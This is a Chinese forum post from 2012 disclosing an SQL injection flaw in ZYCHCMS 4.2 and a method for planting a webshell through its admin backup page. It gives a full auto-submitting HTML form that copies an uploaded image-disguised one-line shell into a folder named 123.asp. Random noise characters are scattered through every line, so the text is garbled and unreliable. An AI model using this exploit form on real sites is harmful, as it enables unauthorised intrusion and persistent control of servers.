' Y+ q" b8 v/ ?9 W5 f& D1 R8 X# I0 e1 r
2 E6 h/ r6 o) [8 `- W' z8 h4 \6 Y7 n2 q+ f
, V3 ~. J4 p& z" i* e影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
! D8 m" V/ t' ~+ r0 j T ①SQL注射漏洞, y0 s2 N8 L9 u A- _ {
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
/ g% g* O q- p' w 漏洞原因:未过滤0 i; f; a. A( }0 Z; u
漏洞代码:
9 F, I) t$ k( k+ k, s0 ]# \. d' S 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
4 `$ k8 M9 ], c1 ^7 Q H3 L 修复方法:在文件开头加入代码
" K5 S$ _; J) V H% A
" e7 n: W; g: n1 M
( f8 b- N! f6 d. s! u3 X5 k( r* K②后台拿WBSHELL
- I* j3 H. M* ^/ H; ] 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
6 b1 x5 _8 l8 _ p) i- s 这里在网上找了一个,改了下,将就着用。
! W" [: T K: w9 p' E% ` 以下是代码本地提交代码 B1 f) ^' L1 }. r, V
5 U- V, `% f B1 a$ A% l4 ]. V9 y* |! B. e- s
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>" U- W, F* s" Q4 w
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
& c. m" P, P& c% T A <tr>
2 k# |, ~' H: X0 g <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
$ D, l4 J4 H Q, y* T </tr>/ r0 T1 G C+ `$ t
<tr>& x: W9 D' O9 ^/ e$ m9 x# H c
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>7 L$ d r. i4 S& \- K0 r
</span>0 s% b' s) r; f$ b+ r
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >$ H% p8 ^) f- m% q+ u; ]: a5 Y, Y
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >7 N* h2 v& r# u: D$ b6 H6 `7 c+ S7 f
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>6 l$ w8 }6 t3 c7 O$ s
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
+ F5 J4 u( \5 X) P0 C6 F) m7 i: P <div align=”left”>
8 k, a' e& L0 A5 o8 Y( U! t <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
" W5 C; r5 j* S <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>3 [$ ?3 A8 G- O, @
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” /># ]: ^' j8 y4 Q ~$ f. `
</div></td>
0 q- u3 b; ~. u( `- j- H! s </tr>( _' _; S+ g' O2 S3 A6 a* T
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>3 @7 C1 c1 |! E
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
$ b; o- {6 A# z. N4 J( J <td class=”td”><div align=”left”>
0 ?) d1 ^) M2 V <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />1 z d; _+ [9 ]8 z7 F/ C9 I
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>* W; C3 d/ T& h6 t9 R1 c) N, ~; K0 {
</tr>
4 D0 f7 w8 U, k% i0 j- S- a0 A" b C/ W <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>3 \3 x4 m. u9 p/ f+ q
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>3 w o) K Z3 f& M3 |2 _2 p
<td class=”td”><div align=”left”>
: M* ^* t5 V/ t <input type=”submit” value=”确定备份” class=”btn”
, w& q: n3 J; N' O7 j; S </div></td>2 K( \8 J+ ^1 {; ?2 v" h" o
</tr>& Z: h- } V1 G
</table></td></tr></form>
1 X! `/ X4 O, S V) R </table>! k9 C& a8 ^1 h0 u. P8 E; C
</td>, v# s. t+ Z1 C: ?( C
</tr>
" y- s& j2 u2 |* d$ o& | </table>8 b) v' {; ~; A% E; U
<script>
: H) d' `* y- q0 c# P document.all.add.submit();
{2 _5 z: ]8 K" O/ }. L p; c </script>2 L }( [+ P, M7 @4 ]9 {- t6 X
/ k( |, T% {" V [% T! ^4 p
0 M7 W- h2 B* K: o! K
. H' C: J! t) O6 ]
) B/ }$ ]. g; m; b. O. [
; i( u$ p2 p! o. l; R; A
$ U2 ^' H1 o7 s. x' f( W1 A
5 P. _+ v/ E' \3 a
! k) f( t0 m6 ~1 R5 d# i
8 X0 P8 D( m4 p# W1 `
8 @8 @% Z4 Y8 [& b. s( B" } |
发表于 2012-9-10 21:09:51
收藏
支持
反对